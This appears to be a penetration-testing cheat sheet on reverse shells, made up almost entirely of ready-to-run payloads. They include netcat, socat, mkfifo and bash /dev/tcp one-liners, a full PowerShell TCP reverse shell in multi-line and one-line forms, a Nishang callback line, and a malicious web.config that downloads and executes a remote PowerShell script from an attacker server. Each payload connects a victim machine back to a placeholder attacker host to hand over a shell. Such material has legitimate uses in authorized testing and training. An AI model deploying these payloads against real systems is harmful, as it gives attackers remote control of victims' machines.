# Reverse Shell

## Netcat

On the attacker computer, first start a listener as follows:

```bash
attacker> $ nc -nvlp 443
```

On the victim shell, connect to the attacker IP device:

```bash
victim> $ nc -nv <attacker.IP> 4444 -e /bin/bash
```

## Socat

On the attacker machine, run socat :

```bash
attacker> $ socat -d -d TCP4-LISTEN:4444 STDOUT
```

Then, on the victim shell, connect to the attacker IP device :

```bash
victim> $ socat TCP4:<attacker.IP>:4444 EXEC:/bin/bash 
```

## Bash

As previously, start a listener on the attacker computer.

```bash
attacker> $ nc -nvlp 443
```

Then, run the following bash instructions on the victim machine.

<pre class="language-bash"><code class="lang-bash"><strong>victim> $ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&#x26;1|nc &#x3C;attacker IP> 443 >/tmp/f
</strong></code></pre>

From a simple web shell, the following command can be useful:

<pre class="language-bash"><code class="lang-bash"><strong>bash -c 'bash -i >&#x26; /dev/tcp/&#x3C;attacker IP>/443 0>&#x26;1'
</strong></code></pre>

{% hint style="info" %}
Resource: <https://www.revshells.com/>
{% endhint %}

## PowerShell

On the attacker machine, open a netcat listener:

```bash
attacker> $ nc -lnvp 443
```

Next, send a PowerShell reverse shell from the victim's computer:

```powershell
C:\\Users\\victim> $client = New-Object System.Net.Sockets.TCPClient('<attacker.IP>',443);
C:\\Users\\victim> $stream = $client.GetStream();
C:\\Users\\victim> [byte[]]$bytes = 0..65535|%{0};
C:\\Users\\victim> while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
C:\\Users\\victim> {
C:\\Users\\victim>    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
C:\\Users\\victim>    $sendback = (iex $data 2>&1 | Out-String );
C:\\Users\\victim>    $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
    $stream.Write($sendbyte,0,$sendbyte.Length);
    $stream.Flush();
}
$client.Close();
```

The above command can also be run from a command prompt as follows:

{% code overflow="wrap" %}

```powershell
C:\\Users\\victim> powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<attacker.IP>',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```

{% endcode %}

## Nishang

First, grab a copy of [Nishang’s Invoke-PowerShellTcp.ps1](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1). Then, add the below line at the end of the script to automatically invoke a callback:

```powershell
Invoke-PowerShellTcp -Reverse -IPAddress <AttackerIp> -Port 443
```

Upload this file to the victim computer and execute it. Do not forget to previously start a listener on the attacker server.

## Web.config

This method can be very destructive where an application already uses a web.config file that is going to be replaced with ours which might not have all the required settings such as the database connection string or some valid assembly references. It is recommended to not use this technique on live websites when an application might have used a web.config file which is going to be replaced. IIS applications that are inside other applications or virtual directories might not use a web.config file and are generally safer candidates than website’s root directory.

{% code title="web.config" overflow="wrap" %}

```xml-doc
<?xml version="1.0" encoding="UTF-8"?> <configuration> <system.webServer> <handlers accessPolicy="Read, Script, Write"> <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" /> </handlers> <security> <requestFiltering> <fileExtensions> <remove fileExtension=".config" /> </fileExtensions> <hiddenSegments> <remove segment="web.config" /> </hiddenSegments> </requestFiltering> </security> </system.webServer> </configuration> <%@ Language=VBScript %> <% call Server.CreateObject("WSCRIPT.SHELL").Run("cmd.exe /c powershell.exe -c iex(new-object net.webclient).downloadstring('http://<AttackerIP>/Invoke-PowerShellTcp.ps1')") %>
```

{% endcode %}

Note that the above content aims to download a Nishang's powershell script from the attacker server and instantly execute it on the victim device. So, it is necessary to previously start a web server and a listener corresponding to the one specified on the Nishang's script (please refer to the previous section to configure it). These both operations can respectively be done as follows: &#x20;

```bash
attacker> $ python -m http.server 80
```

```bash
attacker> $ nc -nvlp 443
```